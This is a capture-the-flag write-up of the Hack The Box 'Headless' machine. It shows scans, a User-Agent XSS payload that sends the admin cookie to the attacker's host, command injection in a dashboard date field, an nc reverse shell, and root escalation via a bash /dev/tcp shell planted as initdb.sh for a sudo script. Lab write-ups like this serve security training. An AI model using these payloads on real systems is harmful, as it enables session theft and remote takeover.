HTB Headless done
Headless
Notes
port 5000
Werkzeug/2.2.2 Python/3.11.2
Set-Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs
OS:
Linux
Technology:
Werkzeug/2.2.2 Python/3.11.2
IP Address:
10.10.11.8
Open ports:
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
5000/tcp open upnp?
Users and pass:
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Headless]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.11.8_nmap 10.10.11.8 ; cat 10.10.11.8_nmap.nmap | grep "tcp.*open"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-29 01:01 CEST
Nmap scan report for 10.10.11.8
Host is up (0.034s latency).
Not shown: 65476 closed tcp ports (reset), 57 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 90:02:94:28:3d:ab:22:74:df:0e:a3:b2:0f:2b:c6:17 (ECDSA)
|_ 256 2e:b9:08:24:02:1b:60:94:60:b3:84:a9:9e:1a:60:ca (ED25519)
5000/tcp open upnp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/2.2.2 Python/3.11.2
| Date: Sun, 28 Jul 2024 23:01:57 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 2799
| Set-Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs; Path=/
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Under Construction</title>
| <style>
| body {
| font-family: 'Arial', sans-serif;
| background-color: #f7f7f7;
| margin: 0;
| padding: 0;
| display: flex;
| justify-content: center;
| align-items: center;
| height: 100vh;
| .container {
| text-align: center;
| background-color: #fff;
| border-radius: 10px;
| box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.2);
| RTSPRequest:
| <!DOCTYPE HTML>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
Ffuz - http://10.10.11.8:5000
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Headless]
└─$ ffuf -u http://10.10.11.8:5000/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -o 10.10.11.8_5000_ffuz -of all -e .php,.html,.txt,.bac,.backup
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.11.8:5000/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup
:: Output file : 10.10.11.8_5000_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
dashboard [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 62ms]
support [Status: 200, Size: 2363, Words: 836, Lines: 93, Duration: 35ms]
:: Progress: [122814/122814] :: Job [1/1] :: 435 req/sec :: Duration: [0:08:35] :: Errors: 0 ::
Open website: http://10.10.11.8:5000/support
1) We trying send message with XSS payload
___
POST /support HTTP/1.1
Host: 10.10.11.8:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Origin: http://10.10.11.8:5000
Connection: close
Referer: http://10.10.11.8:5000/support
Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs
Upgrade-Insecure-Requests: 1
fname=pentester&lname=pentest&email=pentester%40test.pl&phone=123123123&message=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
---
2) We add second XSS payload in section User-Agent
___
POST /support HTTP/1.1
Host: 10.10.11.8:5000
User-Agent: <script>alert("XSS")</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Origin: http://10.10.11.8:5000
Connection: close
Referer: http://10.10.11.8:5000/support
Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs
Upgrade-Insecure-Requests: 1
fname=pentester&lname=pentest&email=pentester%40test.pl&phone=123123123&message=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Cookie theft by XSS
* Start Netcat and grab admin cookie
Admin cookie: is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Headless]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.15.88] from (UNKNOWN) [10.10.11.8] 56634
GET /?c=is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0 HTTP/1.1
Host: 10.10.15.88
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:5000/
Connection: keep-alive
---
Create a XSS payload via Burp
Payload: <img src=x onerror=this.src='http://10.10.15.88/?c='+document.cookie>
___
POST /support HTTP/1.1
Host: 10.10.11.8:5000
User-Agent: <img src=x onerror=this.src='http://10.10.15.88/?c='+document.cookie>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Origin: http://10.10.11.8:5000
Connection: close
Referer: http://10.10.11.8:5000/support
Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs
Upgrade-Insecure-Requests: 1
fname=pentester&lname=pentest&email=pentester%40test.pl&phone=123123123&message=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Open website: http://10.10.11.8:5000/dashboard
We use admin cookie and login to /dashboard
is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
Command injection via Burp
* I put command into POST parametr "date"
date=2023-09-15;id
___
Request:
POST /dashboard HTTP/1.1
Host: 10.10.11.8:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Origin: http://10.10.11.8:5000
Connection: close
Referer: http://10.10.11.8:5000/dashboard
Cookie: is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
Upgrade-Insecure-Requests: 1
date=2023-09-15;id
__
Response:
Administrator Dashboard</h1>
<p>Generate a website health report:</p>
<form action="/dashboard" method="post">
<label for="date">Select Date:</label>
<input type="date" id="date" name="date" value="2023-09-15" required>
<button type="submit">Generate Report</button>
</form>
</div>
<div id="output-container">
<div id="output-content" style="background-color: green; color: white; padding: 10px; border-radius: 5px;">
Systems are up and running!
uid=1000(dvir) gid=1000(dvir) groups=1000(dvir),100(users)
Create revshell via Burp
* Create revshell
Payload: nc+10.10.15.88+82+-e+/bin/bash
___
Request:
POST /dashboard HTTP/1.1
Host: 10.10.11.8:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Origin: http://10.10.11.8:5000
Connection: close
Referer: http://10.10.11.8:5000/dashboard
Cookie: is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
Upgrade-Insecure-Requests: 1
date=2023-09-15;nc+10.10.15.88+82+-e+/bin/bash
---
* Start netcat
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Headless]
└─$ netcat -lvnp 82
listening on [any] 82 ...
connect to [10.10.15.88] from (UNKNOWN) [10.10.11.8] 39494
whereis python
python:
python -V
python -c 'import pty; pty.spawn("/bin/bash")'
script /dev/null -c /bin/bash
Script started, output log file is '/dev/null'.
dvir@headless:~/app$
Read flag: user.txt
dvir@headless:~/app$ ls -l /home
ls -l /home
total 4
drwx------ 8 dvir dvir 4096 Feb 16 23:49 dvir
dvir@headless:~/app$ cd /home/dvir
cd /home/dvir
dvir@headless:~$ ls -la
ls -la
total 48
drwx------ 8 dvir dvir 4096 Feb 16 23:49 .
drwxr-xr-x 3 root root 4096 Sep 9 2023 ..
drwxr-xr-x 3 dvir dvir 4096 Feb 16 23:49 app
lrwxrwxrwx 1 dvir dvir 9 Feb 2 16:05 .bash_history -> /dev/null
-rw-r--r-- 1 dvir dvir 220 Sep 9 2023 .bash_logout
-rw-r--r-- 1 dvir dvir 3393 Sep 10 2023 .bashrc
drwx------ 12 dvir dvir 4096 Sep 10 2023 .cache
lrwxrwxrwx 1 dvir dvir 9 Feb 2 16:05 geckodriver.log -> /dev/null
drwx------ 3 dvir dvir 4096 Feb 16 23:49 .gnupg
drwx------ 4 dvir dvir 4096 Feb 16 23:49 .local
drwx------ 3 dvir dvir 4096 Sep 10 2023 .mozilla
-rw-r--r-- 1 dvir dvir 807 Sep 9 2023 .profile
lrwxrwxrwx 1 dvir dvir 9 Feb 2 16:06 .python_history -> /dev/null
drwx------ 2 dvir dvir 4096 Feb 16 23:49 .ssh
-rw-r----- 1 root dvir 33 Aug 1 07:03 user.txt
dvir@headless:~$ cat user.txt ; id ; ip a
cat user.txt ; id ; ip a
e3553dbac3ac781cefa7e9ad8e745e8e
uid=1000(dvir) gid=1000(dvir) groups=1000(dvir),100(users)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:d9:35 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.8/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:fe94:d935/64 scope global dynamic mngtmpaddr
valid_lft 86399sec preferred_lft 14399sec
inet6 fe80::250:56ff:fe94:d935/64 scope link
valid_lft forever preferred_lft forever
dvir@headless:~$
Privilege Escalation
Check sudo -l
dvir@headless:~/app$ sudo -l
sudo -l
Matching Defaults entries for dvir on headless:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User dvir may run the following commands on headless:
(ALL) NOPASSWD: /usr/bin/syscheck
Read details about file: /usr/bin/syscheck
dvir@headless:~/app$ ls -la /usr/bin/syscheck ; cat /usr/bin/syscheck
ls -la /usr/bin/syscheck ; cat /usr/bin/syscheck
-r-xr-xr-x 1 root root 768 Feb 2 16:11 /usr/bin/syscheck
#!/bin/bash
if [ "$EUID" -ne 0 ]; then
exit 1
fi
last_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted_time"
disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk_space"
load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load_average"
if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
/usr/bin/echo "Database service is not running. Starting it..."
./initdb.sh 2>/dev/null
else
/usr/bin/echo "Database service is running."
fi
exit 0
Create a revshell
dvir@headless:~/app$ cd /tmp/
cd /tmp/
dvir@headless:/tmp$ echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.88/4444 0>&1'" > /tmp/initdb.sh
<& /dev/tcp/10.10.15.88/4444 0>&1'" > /tmp/initdb.sh
dvir@headless:/tmp$
chmod a
dvir@headless
dvir@headless:/tmp$ chmod a+rwx initdb.sh
chmod a+rwx initdb.sh
dvir@headless:/tmp$ sudo /usr/bin/syscheck
sudo /usr/bin/syscheck
Last Kernel Modification Time: 01/02/2024 10:05
Available disk space: 1.8G
System load average: 0.01, 0.02, 0.06
Database service is not running. Starting it...
Read flag: root.txt
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Headless]
└─$ netcat -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.15.88] from (UNKNOWN) [10.10.11.8] 39540
root@headless:/tmp#
root@headless:/tmp# cd /root
ls -lcd /root
root@headlesls -la
ls -la
total 40
drwx------ 6 root root 4096 Aug 1 07:03 .
drwxr-xr-x 18 root root 4096 Feb 16 23:49 ..
lrwxrwxrwx 1 root root 9 Feb 2 16:07 .bash_history -> /dev/null
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
drwx------ 5 root root 4096 Sep 10 2023 .cache
-rw------- 1 root root 20 Feb 17 00:31 .lesshst
drwxr-xr-x 3 root root 4096 Sep 10 2023 .local
drwx------ 3 root root 4096 Sep 10 2023 .mozilla
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-rw-r----- 1 root root 33 Aug 1 07:03 root.txt
drwx------ 2 root root 4096 Sep 9 2023 .ssh
root@headless:~#
root@headless:~# cat root.txt ; id ; ip a
cat root.txt ; id ; ip a
78d17a30f3c84b89b5bf386c1cefc664
uid=0(root) gid=0(root) groups=0(root)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:d9:35 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.8/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:fe94:d935/64 scope global dynamic mngtmpaddr
valid_lft 86400sec preferred_lft 14400sec
inet6 fe80::250:56ff:fe94:d935/64 scope link
valid_lft forever preferred_lft forever
root@headless:~#
References
Lessons Learned